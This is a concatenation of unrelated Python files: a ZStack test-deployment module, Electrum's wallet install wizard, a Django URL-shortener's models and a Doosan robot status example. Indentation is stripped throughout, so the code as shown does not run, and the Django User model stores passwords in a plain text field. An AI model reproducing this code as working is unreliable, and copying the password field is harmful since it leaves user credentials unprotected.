wait_for_thread_done()
def add_pxe_server(scenarioConfig, scenarioFile, deployConfig, session_uuid):
def _add_pxe_server(pxe):
action = api_actions.CreateBaremetalPxeServerAction()
action.name = pxe.name_
action.sessionUuid = session_uuid
action.description = pxe.description__
action.dhcpInterface = pxe.dhcpInterface_
action.dhcpRangeBegin = pxe.dhcpRangeBegin_
action.dhcpRangeEnd = pxe.dhcpRangeEnd_
action.dhcpRangeNetmask = pxe.dhcpRangeNetmask_
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except Exception as e:
exc_info.append(sys.exc_info())
if not xmlobject.has_element(deployConfig, 'pxe'):
return
pxe = deployConfig.pxe
thread = threading.Thread(target=_add_pxe_server, args=(pxe,))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
#Add VM -- Pass
def _thread_for_action(action):
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
#Add Virtual Router Offering
def add_virtual_router(scenarioConfig, scenarioFile, deployConfig, session_uuid, l3_name = None, \
zone_name = None):
if not xmlobject.has_element(deployConfig, 'instanceOfferings.virtualRouterOffering'):
return
for i in xmlobject.safe_list(deployConfig.instanceOfferings.virtualRouterOffering):
if l3_name and l3_name != i.managementL3NetworkRef.text_:
continue
if zone_name and zone_name != i.zoneRef.text_:
continue
print "continue l3_name: %s; zone_name: %s" % (l3_name, zone_name)
action = api_actions.CreateVirtualRouterOfferingAction()
action.sessionUuid = session_uuid
action.name = i.name_
action.description = i.description__
action.cpuNum = i.cpuNum_
#action.cpuSpeed = i.cpuSpeed_
if i.memorySize__:
action.memorySize = sizeunit.get_size(i.memorySize_)
elif i.memoryCapacity_:
action.memorySize = sizeunit.get_size(i.memoryCapacity_)
action.isDefault = i.isDefault__
action.type = 'VirtualRouter'
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=i.zoneRef.text_)
zinv = get_first_item_from_list(zinvs, 'zone', i.zoneRef.text_, 'virtual router offering')
action.zoneUuid = zinv.uuid
cond = res_ops.gen_query_conditions('zoneUuid', '=', zinv.uuid)
cond1 = res_ops.gen_query_conditions('name', '=', \
i.managementL3NetworkRef.text_, cond)
minvs = res_ops.query_resource(res_ops.L3_NETWORK, cond1, \
session_uuid)
minv = get_first_item_from_list(minvs, 'Management L3 Network', i.managementL3NetworkRef.text_, 'virtualRouterOffering')
action.managementNetworkUuid = minv.uuid
if xmlobject.has_element(i, 'publicL3NetworkRef'):
cond1 = res_ops.gen_query_conditions('name', '=', \
i.publicL3NetworkRef.text_, cond)
pinvs = res_ops.query_resource(res_ops.L3_NETWORK, cond1, \
session_uuid)
pinv = get_first_item_from_list(pinvs, 'Public L3 Network', i.publicL3NetworkRef.text_, 'virtualRouterOffering')
action.publicNetworkUuid = pinv.uuid
iinvs = res_ops.get_resource(res_ops.IMAGE, session_uuid, \
name=i.imageRef.text_)
iinv = get_first_item_from_list(iinvs, 'Image', i.imageRef.text_, 'virtualRouterOffering')
action.imageUuid = iinv.uuid
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
def deploy_initial_database(deploy_config, scenario_config = None, scenario_file = None):
operations = [
add_backup_storage,
add_zone,
add_l2_network,
add_primary_storage,
add_cluster,
add_host,
add_l3_network,
add_image,
add_disk_offering,
add_instance_offering,
add_virtual_router,
add_pxe_server
]
for operation in operations:
session_uuid = account_operations.login_as_admin()
try:
operation(scenario_config, scenario_file, deploy_config, session_uuid)
except Exception as e:
test_util.test_logger('[Error] zstack deployment hit an exception when doing: %s. The real exception is:' % operation.__name__)
print('----------------------Exception Reason------------------------')
traceback.print_exc(file=sys.stdout)
print('-------------------------Reason End---------------------------\n')
raise e
finally:
account_operations.logout(session_uuid)
test_util.test_logger('[Done] zstack initial database was created successfully.')
def generate_dup_name(origin_name, num, prefix=None):
if num == 0:
return origin_name
if prefix:
return str(origin_name) + '-' + str(prefix) + str(num)
else:
return str(origin_name) + '-' + str(num)
def generate_dup_host_ip(origin_ip, zone_ref, cluster_ref, host_ref):
ip_fields = origin_ip.split('.')
ip_fields[1] = str(int(ip_fields[1]) + zone_ref)
ip_fields[2] = str(int(ip_fields[2]) + cluster_ref)
ip_fields[3] = str(int(ip_fields[3]) + host_ref)
return '.'.join(ip_fields)
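# Worked examples for the two helpers above, derived directly from the code:
#   generate_dup_name('zone1', 0, 'z')          -> 'zone1'
#   generate_dup_name('zone1', 2, 'z')          -> 'zone1-z2'
#   generate_dup_host_ip('10.0.1.10', 1, 2, 3)  -> '10.1.3.13'
# Note that generate_dup_host_ip does not validate the result, so large ref
# values can push an octet past 255.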
image_thread_queue = 0
@lock.lock('image_thread')
def increase_image_thread():
global image_thread_queue
image_thread_queue += 1
@lock.lock('image_thread')
def decrease_image_thread():
global image_thread_queue
image_thread_queue -= 1
def wait_for_image_thread_queue():
while image_thread_queue >= IMAGE_THREAD_LIMIT:
time.sleep(1)
print 'image_thread_queue: %d' % image_thread_queue
def wait_for_thread_queue():
while threading.active_count() > DEPLOY_THREAD_LIMIT:
check_thread_exception()
time.sleep(1)
def cleanup_exc_info():
global exc_info
exc_info = []
def check_thread_exception():
if exc_info:
info1 = exc_info[0][1]
info2 = exc_info[0][2]
cleanup_exc_info()
raise info1, None, info2
def wait_for_thread_done(report = False):
while threading.active_count() > 1:
check_thread_exception()
time.sleep(1)
if report:
print 'thread count: %d' % threading.active_count()
check_thread_exception()
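# The helpers above implement the thread throttling pattern used by the add_*
# functions in this module:
#   thread = threading.Thread(target=_thread_for_action, args=(action, ))
#   wait_for_thread_queue()   # block while too many worker threads are active
#   thread.start()
#   ...
#   wait_for_thread_done()    # wait for all workers, re-raising any stored exception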
def get_nfs_ip_for_seperate_network(scenarioConfig, virtual_host_ip, nfs_ps_name):
import scenario_operations as sce_ops
zstack_management_ip = scenarioConfig.basicConfig.zstackManagementIp.text_
storageNetworkUuid = None
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
for l3Network in xmlobject.safe_list(vm.l3Networks.l3Network):
if xmlobject.has_element(l3Network, 'primaryStorageRef') and l3Network.primaryStorageRef.text_ == nfs_ps_name:
storageNetworkUuid = l3Network.uuid_
cond = res_ops.gen_query_conditions('vmNics.ip', '=', virtual_host_ip)
vm_inv_nics = sce_ops.query_resource(zstack_management_ip, res_ops.VM_INSTANCE, cond).inventories[0].vmNics
if len(vm_inv_nics) < 2:
test_util.test_fail("virtual host:%s not has 2+ nics as expected, incorrect for seperate network case" %(virtual_host_ip))
for vm_inv_nic in vm_inv_nics:
if vm_inv_nic.l3NetworkUuid == storageNetworkUuid:
return vm_inv_nic.ip
return None
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
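# Usage pattern for the decorator above (as in the *_dialog methods below):
# the wrapped method receives a run_next callback in kwargs, GoBack and
# UserCancelled are translated into navigation instead of propagating, and
# the return value is forwarded to run_next. Illustrative shape only:
#   @wizard_dialog
#   def some_dialog(self, ..., run_next):
#       return value_passed_to_run_next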
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Needed for Qt on macOS. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
except IOError:
self.storage = None
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
models.py
|
from django.db import models
from django.utils import timezone
from django.utils.crypto import get_random_string
from django.conf import settings
import qrcode
import os
class User(models.Model):
email = models.EmailField(max_length=100)
password = models.CharField(max_length=40)
signup_at = models.DateTimeField(default=timezone.now)
last_login_at = models.DateTimeField(blank=True, null=True)
email_verify = models.CharField(max_length=32, blank=True)
verified = models.BooleanField(default=False)
def __str__(self):
return self.email
class Token(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
token = models.CharField(max_length=40)
def __str__(self):
return self.user.email
class Link(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)
url_id = models.CharField(max_length=65, blank=True)
long_url = models.TextField()
password = models.CharField(max_length=40, blank=True)
has_password = models.BooleanField(default=False)
dateTime = models.DateTimeField(default=timezone.now)
expiration_date = models.DateTimeField(blank=True, null=True)
views_count = models.IntegerField(default=0)
qr_img = models.ImageField(blank=True)
expired = models.BooleanField(default=False)
banned = models.BooleanField(default=False)
def save(self, *args, **kwargs):
if not self.url_id:
self.url_id = get_random_string(length=6)
if self.password:
self.has_password = True
if self.user:
qr_img_path = './Api/QRs/' + self.url_id + '.png'
qr = qrcode.make(('http://%s/' % settings.HOST_NAME) + self.url_id)
qr.save(qr_img_path)
self.qr_img = qr_img_path
super(Link, self).save(*args, **kwargs)
def delete(self, *args, **kwargs):
if self.user:
os.remove('./Api/QRs/' + self.url_id + '.png')
super(Link, self).delete(*args, **kwargs)
def __str__(self):
return self.url_id + ' - ' + self.long_url
class Click(models.Model):
short_url = models.ForeignKey(Link, on_delete=models.CASCADE)
dateTime = models.DateTimeField(default=timezone.now)
os = models.CharField(max_length=20)
browser = models.CharField(max_length=20)
device = models.CharField(max_length=20)
country = models.CharField(max_length=20, blank=True)
def __str__(self):
return str(self.dateTime)
class Report(models.Model):
short_url = models.ForeignKey(Link, on_delete=models.CASCADE)
def __str__(self):
return str(self.short_url)
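# Rough illustration of Link.save() behaviour on first save; the user object
# and URL below are placeholders:
#   link = Link(long_url='https://example.com/docs', user=some_user)
#   link.save()
#   link.url_id        # random 6-character id, e.g. 'aB3xQ9'
#   link.has_password  # False unless a password was supplied
#   link.qr_img        # './Api/QRs/<url_id>.png', generated only when the link has a user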
# run links expiring thread
from .terminator import expire
from threading import Thread
terminator = Thread(target=expire)
terminator.start()
|
dsr_service_motion_simple.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ##
# @brief [py example simple] motion basic test for doosan robot
# @author Kab Kyoum Kim (kabkyoum.kim@doosan.com)
import rospy
import os
import threading, time
import sys
sys.dont_write_bytecode = True
sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__),"../../../../common/imp")) ) # get import path : DSR_ROBOT.py
# for single robot
ROBOT_ID = "dsr01"
ROBOT_MODEL = "m1013"
import DR_init
DR_init.__dsr__id = ROBOT_ID
DR_init.__dsr__model = ROBOT_MODEL
from DSR_ROBOT import *
def shutdown():
print("shutdown time!")
print("shutdown time!")
print("shutdown time!")
pub_stop.publish(stop_mode=STOP_TYPE_QUICK)
return 0
def msgRobotState_cb(msg):
msgRobotState_cb.count += 1
if (0==(msgRobotState_cb.count % 100)):
rospy.loginfo("________ ROBOT STATUS ________")
print(" robot_state : %d" % (msg.robot_state))
print(" robot_state_str : %s" % (msg.robot_state_str))
print(" actual_mode : %d" % (msg.actual_mode))
print(" actual_space : %d" % (msg.actual_space))
print(" current_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posj[0],msg.current_posj[1],msg.current_posj[2],msg.current_posj[3],msg.current_posj[4],msg.current_posj[5]))
print(" current_velj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_velj[0],msg.current_velj[1],msg.current_velj[2],msg.current_velj[3],msg.current_velj[4],msg.current_velj[5]))
print(" joint_abs : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.joint_abs[0],msg.joint_abs[1],msg.joint_abs[2],msg.joint_abs[3],msg.joint_abs[4],msg.joint_abs[5]))
print(" joint_err : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.joint_err[0],msg.joint_err[1],msg.joint_err[2],msg.joint_err[3],msg.joint_err[4],msg.joint_err[5]))
print(" target_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.target_posj[0],msg.target_posj[1],msg.target_posj[2],msg.target_posj[3],msg.target_posj[4],msg.target_posj[5]))
print(" target_velj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.target_velj[0],msg.target_velj[1],msg.target_velj[2],msg.target_velj[3],msg.target_velj[4],msg.target_velj[5]))
print(" current_posx : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posx[0],msg.current_posx[1],msg.current_posx[2],msg.current_posx[3],msg.current_posx[4],msg.current_posx[5]))
print(" current_velx : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_velx[0],msg.current_velx[1],msg.current_velx[2],msg.current_velx[3],msg.current_velx[4],msg.current_velx[5]))
print(" task_err : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.task_err[0],msg.task_err[1],msg.task_err[2],msg.task_err[3],msg.task_err[4],msg.task_err[5]))
print(" solution_space : %d" % (msg.solution_space))
sys.stdout.write(" rotation_matrix : ")
for i in range(0 , 3):
sys.stdout.write( "dim : [%d]"% i)
sys.stdout.write(" [ ")
for j in range(0 , 3):
sys.stdout.write("%d " % msg.rotation_matrix[i].data[j])
sys.stdout.write("] ")
print ##end line
print(" dynamic_tor : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.dynamic_tor[0],msg.dynamic_tor[1],msg.dynamic_tor[2],msg.dynamic_tor[3],msg.dynamic_tor[4],msg.dynamic_tor[5]))
print(" actual_jts : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_jts[0],msg.actual_jts[1],msg.actual_jts[2],msg.actual_jts[3],msg.actual_jts[4],msg.actual_jts[5]))
print(" actual_ejt : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_ejt[0],msg.actual_ejt[1],msg.actual_ejt[2],msg.actual_ejt[3],msg.actual_ejt[4],msg.actual_ejt[5]))
print(" actual_ett : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_ett[0],msg.actual_ett[1],msg.actual_ett[2],msg.actual_ett[3],msg.actual_ett[4],msg.actual_ett[5]))
print(" sync_time : %7.3f" % (msg.sync_time))
print(" actual_bk : %d %d %d %d %d %d" % (msg.actual_bk[0],msg.actual_bk[1],msg.actual_bk[2],msg.actual_bk[3],msg.actual_bk[4],msg.actual_bk[5]))
print(" actual_bt : %d %d %d %d %d " % (msg.actual_bt[0],msg.actual_bt[1],msg.actual_bt[2],msg.actual_bt[3],msg.actual_bt[4]))
print(" actual_mc : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_mc[0],msg.actual_mc[1],msg.actual_mc[2],msg.actual_mc[3],msg.actual_mc[4],msg.actual_mc[5]))
print(" actual_mt : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_mt[0],msg.actual_mt[1],msg.actual_mt[2],msg.actual_mt[3],msg.actual_mt[4],msg.actual_mt[5]))
#print digital i/o
sys.stdout.write(" ctrlbox_digital_input : ")
for i in range(0 , 16):
sys.stdout.write("%d " % msg.ctrlbox_digital_input[i])
print ##end line
sys.stdout.write(" ctrlbox_digital_output: ")
for i in range(0 , 16):
sys.stdout.write("%d " % msg.ctrlbox_digital_output[i])
print
sys.stdout.write(" flange_digital_input : ")
for i in range(0 , 6):
sys.stdout.write("%d " % msg.flange_digital_input[i])
print
sys.stdout.write(" flange_digital_output : ")
for i in range(0 , 6):
sys.stdout.write("%d " % msg.flange_digital_output[i])
print
#print modbus i/o
sys.stdout.write(" modbus_state : " )
if len(msg.modbus_state) > 0:
for i in range(0 , len(msg.modbus_state)):
sys.stdout.write("[" + msg.modbus_state[i].modbus_symbol)
sys.stdout.write(", %d] " % msg.modbus_state[i].modbus_value)
print
print(" access_control : %d" % (msg.access_control))
print(" homming_completed : %d" % (msg.homming_completed))
print(" tp_initialized : %d" % (msg.tp_initialized))
print(" mastering_need : %d" % (msg.mastering_need))
print(" drl_stopped : %d" % (msg.drl_stopped))
